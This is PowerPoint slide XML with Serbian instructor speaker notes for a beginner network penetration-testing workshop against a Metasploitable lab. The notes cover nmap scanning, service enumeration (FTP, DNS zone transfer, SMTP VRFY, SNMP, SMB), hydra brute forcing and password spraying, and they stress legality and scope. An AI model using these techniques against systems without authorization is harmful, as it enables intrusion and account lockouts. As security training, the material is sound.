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Lst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId6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notesMaster" Target="notesMasters/notesMaster1.xml"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/presProps" Target="presProps.xml"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/viewProps" Target="viewProps.xml"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId6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1: Naslovni, oko 3 min
Poenta: ovo je radionica, ne predavanje. Laptopi se otvaraju odmah.
Šta da pričaš:
- Predstavi se kratko i reci odakle dolaziš sa ovom temom, ne biografiju nego kontekst: praviš blue team izazove, radiš sa firmama, treniraš reprezentaciju.
- Reci jasno šta je cilj dva dana: da svako od njih na kraju ume sam da uzme jednu IP adresu i dođe do shell-a, i da zna da objasni svaki korak.
- Reci da nema pretpostavljenog predznanja. Ako neko ne zna šta je port, danas je tačno na pravom mestu.
Iz prakse:
Ovo je sadržaj koji se u komercijalnim kursevima prodaje kao "network penetration testing fundamentals". Razlika je što ovde imaju nekoga kome mogu da dignu ruku. Reci im da iskoriste to, jer je YouTube besplatan, a pitanje uživo nije.
Pitaj ih: ko je ikada pokrenuo nmap? Ko zna šta je port? Po broju ruku odmah znaš da li ubrzavaš ili usporavaš prva dva sata.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2: Šta treba da imaju otvoreno, oko 5 min
Poenta: bez pokrenutog laba, ova dva dana su film.
Šta da pričaš:
- Kali nije obavezan. Kali je samo Debian sa unapred spakovanim alatima. Ako neko voli Ubuntu ili Arch, sve radi, samo mora sam da instalira.
- Host-only mreža je bitna iz dva razloga: Metasploitable nema firewall, nema update od 2012, i ne sme da vidi internet, niti internet sme da vidi njega.
- Docker varijanta je za one koji nemaju RAM za dve virtuelne mašine, ali reci im da se malo razlikuje od originalne VM.
Iz prakse:
Klasična greška: adapter ostane na NAT i onda studenti skeniraju 10.0.2.15 i čude se što je to njihova sopstvena mašina. Druga klasična greška: skeniraju svoj gateway na kućnoj mreži jer im je bridged. Naglasi ovo sada, uštedećeš sebi dvadeset pitanja kasnije.
Pitaj ih: ko ima obe mašine pokrenute upravo sada? Ko vidi izlaz komande `ip a` sa adresom koja počinje sa 192.168.56?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3: Pravila igre, oko 7 min
Poenta: skeniranje tuđe mreže je krivično delo, a ne nestašluk.
Šta da pričaš:
- Naši zakoni ovo pokrivaju u glavi Krivičnog zakonika o delima protiv bezbednosti računarskih podataka, gde je neovlašćeni pristup zaštićenoj računarskoj mreži posebno delo. Reci da nisi pravnik i da neka svako pročita tačan tekst, ali da niko ne izlazi odavde sa utiskom da je ovo siva zona. U EU postoji Direktiva 2013/40 koja isto reguliše napade na informacione sisteme.
- Objasni razliku između dozvole i saglasnosti. Usmeno "možeš slobodno" od druga koji radi u firmi nije scope dokument. Scope je lista IP adresa i vremenski prozor, potpisan.
- Objasni zašto vreme skeniranja ulazi u ugovor: skeniranje produkcije u devet ujutru na dan isplate plata je najbrži način da dobiješ poziv od incident tima.
Iz prakse:
Najčešća rečenica koju čuješ od početnika: "pa ja samo gledam, ne diram ništa". Port sken nije gledanje. To je kucanje na svih 65535 vrata i zapisivanje ko se javio. Uporedi to sa nekim ko obilazi zgradu i proverava sve kvake. Niko ne kaže "pa nisam ušao".
Druga stvar koju stalno moraš da ponavljaš: to što je nešto vidljivo na Shodanu ne znači da je dozvoljeno. Shodan je katalog, ne dozvola.
Pitaj ih: da li je legalno skenirati sajt fakulteta? Odgovor je ne, i to je dobar trenutak da vidiš ko je razumeo.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4: Mapa puta, oko 2 min
Poenta: postoji redosled i on nije slučajan.
Šta da pričaš:
- Prođi kroz osam sekcija brzo, po deset sekundi svaka. Ne ulazi u detalje, samo daj oblik.
- Naglasi da posle svake veće celine sledi zadatak od deset minuta i da tada rade oni, a ti šetaš po sali.
- Reci da poslednja dva bloka, case studies i izveštavanje, nisu dodatak nego razlog zbog kog se ovo uči.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5: Divider, sekcija 01
Kratka pauza u ritmu. Reci jednu rečenicu: "Pre nego što dodirnemo ijedan alat, tri stvari o mrežama koje ne smemo da preskočimo."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6: Šta je network pentest, oko 5 min
Poenta: plaćen si da nađeš put unutra pre nekog drugog i da zapišeš tačno kako si ušao.
Šta da pričaš:
- Razlika između skenera i pentestera: skener daje listu, ti daješ dokaz. Nessus će reći "moguća ranjivost, srednji rizik". Ti kažeš "evo shell-a, evo sadržaja /etc/shadow, evo tačne komande".
- Objasni da rušenje produkcije nije uspeh nego neuspeh angažmana. Klijent te plaća da nađeš rupu, ne da mu oboriš servis.
- Izveštaj je proizvod, ne shell. Klijent ne kupuje tvoju radost, kupuje dokument na osnovu kog neko sledeće nedelje nešto popravi.
Iz prakse:
Rečenica koja se u struci ponavlja godinama: ako nije u izveštaju, nije se ni desilo. Video sam ljude koji su na angažmanu došli do domain admina i posle tri dana nisu umeli da rekonstruišu kako, jer nisu pisali usput. Taj nalaz praktično ne postoji.
Druga stvar: klijenti pamte kratko. Za dva meseca niko se neće setiti tvog demonstriranja, ali će izveštaj i dalje kružiti po firmi.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7: Petlja koju vrtiš ceo dan, oko 5 min
Poenta: ovo nije linija nego petlja. Svaki novi host, servis ili kredencijal te vraća na korak 02.
Šta da pričaš:
- Prođi kroz šest faza, ali zadrži se na enumeraciji jer je to faza gde početnici najviše gube.
- Objasni zašto se vraćaš unazad: nađeš kredencijal na jednom serveru, probaš ga na drugom, taj drugi ti otvori novu podmrežu, i sad skeniraš ponovo.
- Naglasi da post exploitation nije "sad se igram" nego "sad tražim šta me vodi dublje".
Iz prakse:
Tipičan početnik vidi "port 21 otvoren", ukuca u Google "port 21 exploit", ne nađe ništa i odustane. Onaj ko je razumeo lekciju vidi "vsftpd 2.3.4" i za trideset sekundi zna tačno šta ima. Razlika između te dve osobe je jedna zastavica, `-sV`.
U OSCP zajednici postoji fraza koja se ponavlja do dosade: enumerate, enumerate, enumerate. Postoji razlog zašto je to kliše.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8: IP adrese i portovi, oko 4 min
Poenta: adresa je zgrada, port su vrata, a iza svakih vrata sedi program koji je neko napisao i zaboravio da ažurira.
Šta da pričaš:
- Ako je sala apsolutno početnička, ovde uspori. Nacrtaj analogiju do kraja: jedna zgrada, 65535 stanova, na svakim vratima piše šta se unutra radi.
- Zatvoren port nije servis. Nema programa, kernel se javlja umesto njega. To je bitno jer objašnjava zašto zatvoren port i filtriran port nisu ista stvar.
- Objasni portove ispod 1024: treba ti root da bi ih zauzeo. Otuda i praktična posledica: servis na 8080 obično radi kao neprivilegovan korisnik, a onaj na 80 često ne.
- Na dnu slajda je traka sa deset portova koje ćeš sretati svakog dana. Ne uči ih napamet i ne diktiraj ih. Reci samo: ovih deset ćete videti toliko puta da ćete prestati da ih gledate.
Pitaj ih: ako je servis na portu 80, kao koji korisnik verovatno radi? Ovo je dobar uvod u kasniju priču o privilege escalation.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9: TCP, UDP i handshake, oko 7 min
Poenta: svaki tip TCP skena je samo drugačiji način da započneš ili odbiješ da završiš ista tri paketa.
Šta da pričaš:
- Prođi handshake polako i naglas: SYN, SYN/ACK, ACK. Neka ponove naglas. Ovo je jedina stvar koju napamet moraju da znaju danas.
- Objasni da je SYN zahtev za razgovor, SYN/ACK je "važi, čujem te", a ACK je "važi, počinjemo".
- Za UDP: nema rukovanja, nema garancije. Zbog toga tišina na UDP portu može da znači i otvoren i filtriran, i zato je UDP skeniranje sporo i nepouzdano.
- Reci gde UDP zaista živi: DNS, SNMP, TFTP, DHCP, većina VPN-ova.
Iz prakse:
Ako imaš projektor i vremena, otvori Wireshark uživo i uradi `nc -nv target 22`. Neka vide tri paketa svojim očima. Dvadeset minuta gledanja u Wireshark nauči više o TCP-u nego bilo koji slajd, uključujući i ovaj. To im i reci, iskreno.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10: Lab, oko 4 min
Poenta: ovo je tvoja meta narednih dana i njoj sme sve.
Šta da pričaš:
- Prođi dijagram: Kali sa jedne strane, vboxnet0 u sredini, Metasploitable sa druge.
- Naglasi da Metasploitable ne sme nikada da bude izložen mreži. To je mašina napravljena da bude probijena, sa root shell-om koji bukvalno sluša na portu 1524.
- Pusti ih da odmah pokrenu `ip a` i `sudo nmap -sn` i da nađu metu. Ne daj im IP adresu, neka je nađu.
Iz prakse:
Metasploitable 2 je iz 2012. i tu je namerno: kernel 2.6.24, Samba 3.0.20, vsftpd 2.3.4, MySQL sa praznom root lozinkom. Neko će pitati zašto vežbamo na tako staroj mašini. Odgovor: zato što su tehnike identične, a stara mašina ti dozvoljava da vidiš ceo lanac za deset minuta umesto za tri dana. I zato što u industrijskim mrežama i danas nalaziš mašine ovog uzrasta.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11: Divider, sekcija 02
Jedna rečenica: "Sad prestajemo da pričamo o mrežama i počinjemo da ih ispitujemo."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12: Ko je uopšte tu, oko 5 min
Poenta: prvo pitanje nije koji portovi su otvoreni, nego ko je uopšte živ.
Šta da pričaš:
- `-sn` znači bez port skena. Samo pitanje: ima li nekoga.
- Na lokalnoj mreži nmap koristi ARP, i to je zlato. ARP se skoro nikada ne blokira jer bez njega mreža ne radi. Zato je host discovery na LAN-u brz i pouzdan.
- Van lokalne mreže pada na ICMP echo i probe ka 80 i 443.
- Objasni zamku: ako host ne odgovara na ping, nmap ga preskače i ti nikada ne vidiš njegove otvorene portove. Rešenje je `-Pn`.
Iz prakse:
Ovo je najčešći razlog zbog kog student kaže "ne radi mi nmap". Meta je živa, ali ne odgovara na ping, i nmap uredno kaže "Host seems down". Kada čuješ tu rečenicu u sali, prva reakcija je: dodaj -Pn.
U pravim mrežama Windows mašine podrazumevano ne odgovaraju na ping zbog firewall-a. To znači da bez `-Pn` možeš da propustiš pola domena.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13: Upoznaj nmap, oko 5 min
Poenta: krenu od jedne kratke komande, a ostalo dodaju kad im zatreba.
Šta da pričaš:
- Fyodor, pravo ime Gordon Lyon, objavio nmap 1997. u Phrack-u. Alat je stariji od većine njih u sali i i dalje je prvi koji se otvara.
- Namerno im dajemo samo `sudo nmap -sV META`. Toliko je dovoljno za ceo prvi dan i neće ih preplašiti. Neka je zapišu i neka je otkucaju odmah.
- Tek posle toga pokaži tri dodatka na dnu slajda: `-p-` za sve portove, `-T4` za brzinu, `-oA` da sačuvaš izlaz. Jedan po jedan, kad im zatreba, a ne odjednom.
- Ako neko pita zašto ne odmah `-p-`: zato što na sporoj virtuelci to traje dvadeset minuta, a oni bi za to vreme mogli da urade tri stvari.
- Reci da nmap radi četiri posla: nađi hostove, nađi portove, prepoznaj servise, pusti skripte.
Iz prakse:
Ubaci anegdotu, sala je voli: u Matrix Reloaded, Trinity zaista koristi nmap. Skenira 10.2.2.2, nađe otvoren port 22 i iskoristi stvarnu ranjivost u SSH1 CRC32. To je bio prvi put da je neko u Holivudu prikazao hakovanje tačno, i Fyodor je to godinama isticao na svom sajtu. Nmap se posle pojavljivao i u Bourne Ultimatum i u Devojci sa tetovažom zmaja.
Praktičan savet koji im daj odmah: `-oA` nije opcionalno. Za šest nedelja će te neko pitati šta je bilo otvoreno na toj mašini, i tada ili imaš fajl ili nemaš odgovor.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14: Šta port sken zapravo pita, oko 5 min
Poenta: pošalješ jedan paket, a odgovor ili tišina su cela informacija.
Šta da pričaš:
- Tri panela, tri ishoda: SYN/ACK znači otvoren, RST znači zatvoren, tišina znači filtriran.
- Naglasi da je tišina takođe informacija: znači da postoji nešto između tebe i mete.
- Ovo je slajd na kom se sve kasnije oslanja. Ako ovo razumeju, tipovi skenova prestaju da budu magija.
- Na dnu slajda su još dve reči koje će videti u izlazu: `open|filtered`, gde nmap ne ume da odluči, što je normalno za UDP, i `unfiltered`, gde je port dostupan ali nmap ne tvrdi ništa. Ne troši više od pola minuta na njih, samo da im ne budu strane kada iskoče.
Pitaj ih: ako dobiješ RST, da li je host živ? Da, i to je korisno. Zatvoren port dokazuje da mašina postoji.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15: TCP connect sken, oko 4 min
Poenta: pun handshake, ne treba root, ali ostavlja trag u logovima.
Šta da pričaš:
- `-sT` ne pravi pakete sam, nego traži od operativnog sistema da se poveže, isto kao bilo koji običan program.
- Zato ne treba root, ali zato je i glasan: veza se kompletira, servis je loguje, tvoja IP adresa završi u auth.log.
- Četiri paketa po portu umesto tri, dakle sporije.
- Koristi se kada nemaš root na svojoj mašini ili kada ideš kroz proxy, na primer kroz proxychains.
Iz prakse:
Ako zaboraviš sudo, nmap tiho pređe na -sT. Student misli da radi stealth sken, a zapravo se lepo predstavlja svakom servisu ponaosob. Nauči ih da pogledaju prvi red izlaza, tamo piše koji sken je stvarno pokrenut.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16: SYN sken, oko 5 min
Poenta: pola otvorena veza, tri paketa, ali reč "stealth" je iz 1997. i danas ne znači ništa.
Šta da pričaš:
- Nmap sam pravi pakete, zato treba root.
- Pošalje SYN, dobije SYN/ACK, i umesto ACK pošalje RST. Veza se nikada ne kompletira, pa je mnoge aplikacije ne loguju.
- Brz je jer može da drži hiljade portova u vazduhu odjednom.
- Obavezno razbij mit o stealth-u. Ime je iz vremena kada je logovanje bilo lošije. Danas svaki iole ozbiljan IDS, firewall ili EDR vidi sken preko 65535 portova kao da si upalio sirenu.
Iz prakse:
Kada radiš pravi angažman gde je deo posla da testiraš detekciju, ovo je odličan trenutak da im kažeš kako to izgleda: pokreneš sken, i za dva minuta ti zvoni telefon iz SOC-a. To je zapravo dobar ishod, znači da klijent ima nekoga ko gleda.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17: UDP sken, oko 5 min
Poenta: spor, ružan i skoro svi ga preskaču, zbog čega tamo i leže najlakši nalazi.
Šta da pričaš:
- Nema handshake-a koji možeš da zloupotrebiš. Pošalješ paket i čekaš.
- Zatvoren port odgovara ICMP porukom tip 3 kod 3, port unreachable. To je jedini jasan signal.
- Linux ograničava koliko takvih poruka šalje, često jednu u sekundi. Otuda satima dug sken.
- Praktičan savet: skeniraj top 20 i idi dalje. Nalazi su na 53, 161 i 500.
Iz prakse:
SNMP na 161 sa community stringom "public" je nalaz koji nalaziš iznova i iznova, na štampačima, svičevima, kamerama, UPS uređajima. Skoro niko ne skenira UDP, pa to niko i ne prijavi. Preskakanje UDP-a je razlog zašto pentesteri propuste najlakši nalaz u celom izveštaju.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18: Ostali tipovi skenova, oko 4 min
Poenta: znaj da postoje, znaj zašto su bili pametni, ali ne gradi metodologiju na njima.
Šta da pričaš:
- Tabela je namerno kratka, četiri reda. Prođi je brzo i zadrži se samo na dva: `-sA` koji ne nalazi otvorene portove nego mapira šta firewall filtrira, i `-sI` idle sken koji sken odbija od trećeg hosta pa meta vidi njega, a ne tebe.
- Null, FIN i Xmas se oslanjaju na to da OS pristojno poštuje RFC iz 1981. Windows to ne radi, moderni stackovi i firewalls to ne rade.
- Budi iskren: koristićeš `-sS`, `-sU` i `-sT` godinama i nećeš dodirnuti ostatak.
Iz prakse:
Idle sken je i dalje najelegantnija ideja u celom nmapu, i vredi ga objasniti u dve rečenice jer im ostane u glavi: koristiš predvidljive ID brojeve IP paketa nekog trećeg, dosadnog hosta, kao mernu skalu. Praktično je gotovo neupotrebljiv danas jer moderni operativni sistemi randomizuju te brojeve, ali kao dokaz načina razmišljanja je odličan.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19: Zastavice koje ćeš stvarno kucati, oko 5 min
Poenta: dvanaest zastavica pokriva skoro sav posao, ostalo se guglja kad zatreba.
Šta da pričaš:
- Prođi po grupama, ne redom: koji portovi, koliko duboko, koliko brzo, kako da sačuvaš.
- Objasni `-T4` praktično: na lokalnoj mreži je normalno, a `-T5` gubi pakete i daje ti lažne negativne rezultate. Ne ulazi u celu skalu od T0 do T5, nije im potrebna danas.
- Zadrži se na `-Pn`. To je zastavica koja rešava najčešći problem početnika: host postoji, ne odgovara na ping, nmap ga preskoči, student zaključi da je mašina ugašena.
- Zatvori porukom sa dna slajda: ako pamte samo dve, neka to budu `-sV` i `-oA`.
Iz prakse:
Neko će probati `-p- -T5` na virtuelnoj mašini sa jednim jezgrom, dobiti nepotpune rezultate i zaključiti da mašina nema otvorene portove. Brže nije uvek brže. Ako sken traje predugo, prvo suzi opseg portova, pa tek onda diraj tajming.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20: NSE skripte, oko 4 min
Poenta: nmap nije samo port skener, on je i mali framework.
Šta da pričaš:
- Preko 600 skripti, pisane u Lua jeziku, žive u `/usr/share/nmap/scripts`.
- Kategorije: auth, brute, default, discovery, exploit, safe, version, vuln.
- Upozorenje koje moraš da izgovoriš: kategorije `exploit` i `brute` nisu bezbedne za produkciju. `--script vuln` na produkcionom serveru je odličan način da nešto oboriš i da to bude tvoja krivica.
- Pokaži `--script-help ftp-anon`, to je navika koju treba da usvoje.
Iz prakse:
`ftp-vsftpd-backdoor` na slajdu je savršen primer: skripta ne samo da detektuje ranjivost, ona je i iskorišćava i vraća ti `uid=0(root)`. Tu prestaje razlika između skenera i alata za napad, i to je dobar trenutak da ih podsetiš na slajd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21: Čitanje izlaza, oko 6 min
Poenta: brojevi verzija su cela igra.
Šta da pričaš:
- Ovo je slajd na kom najviše vremena provodiš u sekciji. Izlaz je namerno skraćen na desetak portova da bi mogao da ga pročitaš red po red naglas, bez da ih zatrpaš.
- Za svaki od četiri istaknuta reda objasni šta ti govori i šta je sledeći korak: vsftpd 2.3.4 je prva meta, OpenSSH 4.7p1 nije direktno probojan ali datira celu mašinu u 2008, Samba bez tačne verzije znači ručnu enumeraciju, a bindshell na 1524 znači da su vrata već otvorena.
- Nauči ih da čitaju izlaz kao listu prioriteta, a ne kao spisak.
Iz prakse:
Pitanje koje im postavi i pusti tišinu par sekundi: ako vidiš OpenSSH iz 2008, šta zaključuješ o ostatku mašine? Zaključak nije "SSH je ranjiv", nego "ovu mašinu niko nije dirao petnaest godina, pa je verovatno sve ostalo na njoj isto tako staro". To je način razmišljanja koji ih razdvaja od skenera.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22: Zadatak 1, 10 min rada plus 10 min pregleda
Poenta: neka nađu metu sami, ne daj im IP adresu.
Kako da vodiš zadatak:
- Pusti tajmer i stvarno ćuti prvih pet minuta. Ako odmah počneš da pomažeš, prestaju da razmišljaju.
- Onda prošetaj po sali. Traži tri tipične greške: pogrešna podmreža, zaboravljen sudo, i `-p-` pokrenut bez strpljenja pa prekinut na pola.
- Kada istekne vreme, prozovi troje i traži tačnu komandu, ne rezultat. Rezultat je isti kod svih, komanda nije.
- Poslednje pitanje sa slajda, koji servis bi napao prvi i zašto, je najvažnije. Tu se vidi ko je razumeo enumeraciju.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23: Divider, sekcija 03
Jedna rečenica: "Skeniranje ti kaže da vrata postoje. Sledeća dva sata su o tome kako da saznaš kakva je brava."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24: Način razmišljanja, oko 4 min
Poenta: otvoren port, pa ime servisa, pa tačna verzija, pa poznata slabost, pa pristup. Bez preskakanja.
Šta da pričaš:
- Pročitaj lanac sa slajda naglas, to je kičma cele sekcije.
- Objasni šta se skuplja: verzije do nivoa zakrpe, korisnička imena, deljeni resursi, i konfiguracione greške.
- Naglasi da svako korisničko ime koje nađu ide u `users.txt`. To je fajl koji prave danas, a koriste u sekciji o lozinkama.
- Radi redom, jedan servis po jedan, i piši sve usput.
Iz prakse:
Ovo je rečenica koju vredi ponoviti dvaput: većina pravih nalaza nisu exploiti. To je neko ko je ostavio deljeni folder otvoren, skriptu sa lozinkom, ili nalog koji je trebalo da nestane pre dve godine. Exploit je zabavan, ali izveštaj puni loša konfiguracija.
Kada tražiš posao u ovoj struci, po ovome te razlikuju od nekoga ko je samo naučio da pokrene alat. Alat ume svako. Sistematičnost ne ume skoro niko.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25: FTP, port 21, oko 5 min
Poenta: anonimni pristup i banner koji ti besplatno kaže tačnu verziju.
Šta da pričaš:
- Prođi izlaz sa slajda: korisnik `anonymous`, bilo koja lozinka, i `230 Login successful`.
- Objasni zašto FTP i dalje postoji: interni fajl serveri, štampači, stari sistemi za razmenu podataka, medicinska i industrijska oprema.
- Najveća stvar je pravo pisanja. Ako možeš da uploaduješ u direktorijum koji web server servira, imaš izvršavanje koda. To je klasičan lanac.
- Sve ide u čistom tekstu. Ko sluša mrežu, ima kredencijale.
Iz prakse:
Kada radiš interni pentest, anonimni FTP obično nije na serveru nego na štampaču ili na nekoj mašini u proizvodnji. Skoro uvek unutra nađeš skenirane dokumente ili konfiguracione fajlove. Nekome je to bilo praktično 2011. i od tada niko nije pogledao.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26: SSH, port 22, oko 5 min
Poenta: ne provaljuješ sshd, dolaziš po kredencijale.
Šta da pričaš:
- Banner je nalaz sam po sebi. `OpenSSH 4.7p1 Debian 8ubuntu1` datira mašinu.
- Reci jasno: daljinsko izvršavanje koda u OpenSSH je retko i skupo. Ne troše vreme tražeći exploit za SSH. Ovde se ulazi lozinkom ili ključem.
- Objasni scenu sa `-oKexAlgorithms`: ako moraš da nateraš moderni klijent da priča starim algoritmom, mašina je vrlo stara. To je i nalaz za izveštaj.
- `ssh-audit` daje ocenu koju lepiš direktno u izveštaj.
Iz prakse:
Gde SSH stvarno puca: root login dozvoljen, ponovo iskorišćene lozinke, i privatni ključevi koje neko drži u home direktorijumu sa pravima za čitanje. I `authorized_keys` fajlovi koje niko nije pregledao od kada je poslednji kolega otišao iz firme. To poslednje je nalaz koji uvek prolazi kao ozbiljan, jer je bivši zaposleni sa važećim ključem tema koju menadžment odmah razume.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27: DNS, port 53, oko 8 min
Poenta: DNS je imenik. Ako je imenik javan, dobio si sve interne hostove a da nijedan nisi dodirnuo.
Šta da pričaš:
- Kreni od zapisa u dnu slajda, ali brzo. Objasni zašto TXT vredi gledati: SPF zapisi otkrivaju koje servise firma koristi za poštu, a tamo često stoje i zaboravljeni verifikacioni tokeni. MX ti kaže gde ide pošta, dakle gde je mail server.
- Onda pređi na glavnu stvar, zone transfer. Objasni zašto AXFR uopšte postoji: sekundarni DNS server mora nekako da dobije kopiju cele zone.
- Greška nije u funkciji nego u listi dozvoljenih. Trebalo bi da odgovori samo sekundarnim serverima, a često odgovori svakome ko pita.
- Prođi izlaz sa slike: ns1, mail, vpn, dev, backup, jenkins. Pitaj ih šta bi napali prvo i pusti ih da se posvađaju oko toga trideset sekundi.
- Imena su obaveštajni podatak. Niko ne zove server "dev" slučajno, i niko ne stavlja produkciono ojačanje na mašinu koja se zove "backup".
Iz prakse:
Reci im za `zonetransfer.me`. To je domen koji DigiNinja održava tačno zato da bi ljudi mogli legalno da vežbaju AXFR. To je jedna od retkih stvari koje smeju da probaju sa svog kućnog interneta odmah večeras, i to im daj kao dodatnu vežbu.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28: SMTP, port 25, oko 5 min
Poenta: mail server ti pristojno kaže koji korisnici postoje.
Šta da pričaš:
- Prođi ručnu sesiju sa slajda: `VRFY root` vraća 252, `VRFY marko` vraća 550. To je da i ne, direktno iz protokola.
- `EXPN` proširuje mailing listu u članove, što je još korisnije.
- Ako je VRFY isključen, `RCPT TO` često i dalje odaje isto, jer server odbija nepostojećeg primaoca.
- Open relay objasni u jednoj rečenici: ako server prosleđuje poštu za domene koje ne poseduje, svako može da šalje poštu u ime klijenta.
Iz prakse:
Ovo je slajd gde treba da povežeš sekcije naglas: korisničko ime je pola kredencijala. Sve što ovde pokupe, koriste sutra u hydri. Ako to ne kažeš eksplicitno, polovina sale neće napraviti vezu.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29: SNMP, port 161/udp, oko 5 min
Poenta: community string je lozinka, u verzijama 1 i 2c ide u čistom tekstu, i na previše uređaja je i dalje "public".
Šta da pričaš:
- Objasni šta SNMP zapravo izruči: hostname, verzija OS-a, spisak procesa, otvoreni portovi, mrežni interfejsi, rute, ponekad i lokalni korisnici.
- Najgori su štampači, svičevi, kamere i UPS uređaji. Niko ih ne krpi i niko im ne menja podrazumevani string.
- Verzija 3 rešava problem pravom autentikacijom i enkripcijom, ali većina mreža i dalje vrti 2c.
Iz prakse:
Klasičan potez iz stvarnog života koji vredi ispričati: na starijoj Cisco opremi, ako imaš `private` community string, možeš da nateraš uređaj da ti pošalje svoju kompletnu konfiguraciju preko TFTP-a. U toj konfiguraciji su hash-evi lozinki i često SNMP i VPN podešavanja. Jedan uređaj koji niko ne smatra bitnim ti otvori celu mrežu.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30: SMB, portovi 139 i 445, oko 6 min
Poenta: interni pentesti se dobijaju na SMB-u.
Šta da pričaš:
- Objasni šta je share i zašto je bitan: u deljenim folderima žive lozinke, backupi, skripte i konfiguracioni fajlovi.
- Null sesija je povezivanje bez korisničkog imena i lozinke. Stari Samba i stari Windows to dozvoljavaju.
- Traži prvo šta možeš da čitaš, pa onda gde možeš da pišeš. Pravo pisanja plus skripta koja se automatski pokreće znači izvršavanje koda.
- Napomeni SMBv1 i najavi WannaCry, jer se vraćaš na to u case study delu.
Iz prakse:
Ako imaš vremena za jednu anegdotu iz prakse, neka bude ova: traži fajlove sa imenima tipa `backup.ps1`, `deploy.sh`, `install.bat`. U njima je lozinka servisnog naloga, u čistom tekstu, jer je nekome trebalo da skripta radi bez interakcije. Tako se dolazi od anonimnog pristupa do naloga sa visokim privilegijama, bez ijednog exploita.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31: Zadatak 2, 10 min plus 10 min pregleda
Kako da vodiš zadatak:
- Ovaj zadatak ima pet koraka i deset minuta je malo. Reci im da je u redu ako stignu tri.
- Šetaj i traži one koji su zaglavili na SNMP-u, jer je to najčešće mesto zastoja. Obično je problem što nisu instalirali `snmp` paket ili su zaboravili `-v2c`.
- Kod pregleda insistiraj na `users.txt`. Taj fajl je ulaznica za sutrašnji dan.
- Ako neko završi ranije, daj mu dodatni zadatak: neka nađe MySQL na 3306 i proba praznu root lozinku.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32: Divider, sekcija 04
Jedna rečenica: "Sad prestajemo da tražimo rupe u softveru i počinjemo da tražimo rupe u ljudima."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33: Zašto cela sekcija o lozinkama, oko 5 min
Poenta: ukradeni kredencijali su i dalje najčešći način ulaska, ispred exploita.
Šta da pričaš:
- Prođi tri broja sa slajda i obavezno reci izvor: Verizon DBIR 2025, preko dvanaest hiljada potvrđenih proboja. Kada citiraš broj, uvek reci odakle je, to je navika koju treba da pokupe.
- Poenta broj jedan: exploit često nije ni potreban. Ako radi msfadmin/msfadmin, ne treba ti CVE.
- Poenta broj dva: zato je enumeracija bila prva. SMTP, SNMP i SMB su im dali listu korisnika.
- Poenta broj tri: odbrana isto zna ove brojeve. Zato se svaki neuspeli login loguje.
Iz prakse:
Rečenica koju vredi ostaviti da odjekne: napadači ne biraju najelegantniji put, biraju najjeftiniji. Niko neće pisati exploit ako mu lozinka piše u fajlu koji je iscurio pre dve godine.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34: Hydra, oko 6 min
Poenta: ovo nije razbijanje hash-a offline, ovo je kucanje na živa vrata, i svako kucanje se čuje.
Šta da pričaš:
- Objasni razliku od hashcat i john pristupa: hydra priča sa živim servisom. Svaki pokušaj je prava konekcija i pravi red u logu.
- Prođi anatomiju komande sleva nadesno. Servis i meta uvek idu poslednji, u obliku URL-a.
- Objasni malo `-l` naspram `-L` i `-p` naspram `-P`, jer to studenti mešaju stalno. Malo slovo je jedna vrednost, veliko slovo je fajl.
- `-t 4` je bitan. Podrazumevano 16 paralelnih zadataka je previše za svaki realan sistem.
Iz prakse:
Logo na slajdu je pravi THC Hydra logo, iz njihovog repozitorijuma. THC je grupa koja postoji od devedesetih i alat se održava skoro trideset godina. Reci to kao podsetnik da alati koje uče nisu moda nego infrastruktura struke.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35: Recepti i wordliste, oko 4 min
Poenta: počni sa sto lozinki, ne sa četrnaest miliona.
Šta da pričaš:
- Objasni šta je rockyou.txt i odakle je: iz proboja sajta RockYou 2009. godine, gde su lozinke bile u čistom tekstu, a proboj je bio kroz SQL injection. Oko 32 miliona naloga, iz čega je nastala lista od oko 14 miliona jedinstvenih lozinki.
- To je ujedno i najbolji argument za temu čuvanja lozinki: firma nije bila hakovana zato što je neko probio kriptografiju, nego zato što kriptografije nije ni bilo.
- Praktično: na Kaliju je fajl zapakovan, treba `gunzip`. Neko će sigurno zaglaviti na tome.
- Podseti da za praktičan rad koriste top 100, jer 14 miliona pokušaja preko mreže traje danima.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36: Bruteforce, spraying i stuffing, oko 6 min
Poenta: tri različite stvari, i samo jedna od njih se koristi u pravom napadu.
Šta da pričaš:
- Bruteforce: mnogo lozinki na jedan nalog. Zaključava nalog za nekoliko sekundi na svakom modernom sistemu.
- Spraying: jedna česta lozinka na mnogo naloga. Ostaje ispod praga zaključavanja, jer svaki nalog vidi jedan ili dva neuspeha. Ovo rade pravi napadači.
- Stuffing: gotovi parovi iz proboja, bez pogađanja. Radi jer ljudi koriste istu lozinku svuda.
- Ovde napravi vezu unapred: Colonial Pipeline je počeo upravo ovako. Neka to ostane visiti do case study slajda.
- Prođi upozorenje sa dna slajda ozbiljno: hydra na domenskom nalogu može da zaključa nekoliko stotina zaposlenih za manje od minuta. To je poziv koji ne želiš da primiš.
Iz prakse:
Konkretno pitanje koje se postavlja klijentu pre svakog angažmana: koliko neuspelih pokušaja zaključava nalog i na koliko dugo. Ako klijent ne zna odgovor, to je već nalaz.
Klasična spraying lozinka koja i danas prolazi u firmama u ovom delu sveta je ime meseca ili godišnjeg doba i tekuća godina. To je nešto što možeš da kažeš, a da niko ne pomisli da je egzotično.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37: Zadatak 3, 10 min plus 10 min pregleda
Kako da vodiš zadatak:
- Prvi korak, da sami sastave listu od deset lozinki, je najvredniji deo. Ne daj im gotovu listu. Neka razmišljaju kao neko ko konfiguriše Linux mašinu 2008.
- Šetaj i traži one koji su pustili ceo rockyou. Zaustavi ih i objasni zašto to nema smisla preko mreže.
- Zadnja stavka, brojanje neuspelih logina u `/var/log/auth.log`, je najbitnija. Kada svojim očima vide koliko su buke napravili, priča o detekciji im postane stvarna.
- Pitanje za kraj, koja kontrola bi ih zaustavila, vodi direktno u sutrašnje case studies.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38: Divider, sekcija 05
Jedna rečenica: "Do sada smo gledali kroz prozor. Sad ulazimo."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39: Šta znači "dobio sam shell", oko 5 min
Poenta: shell je program na meti koji čita tvoje komande i izvršava ih.
Šta da pričaš:
- Definicija sa slajda je namerno jednostavna. Za apsolutne početnike, to je čitava poenta: od tog trenutka meta prima instrukcije sa tvoje tastature.
- Objasni dva oblika: kod bind shell-a meta sluša, kod reverse shell-a ti slušaš. Sve ostalo su varijacije.
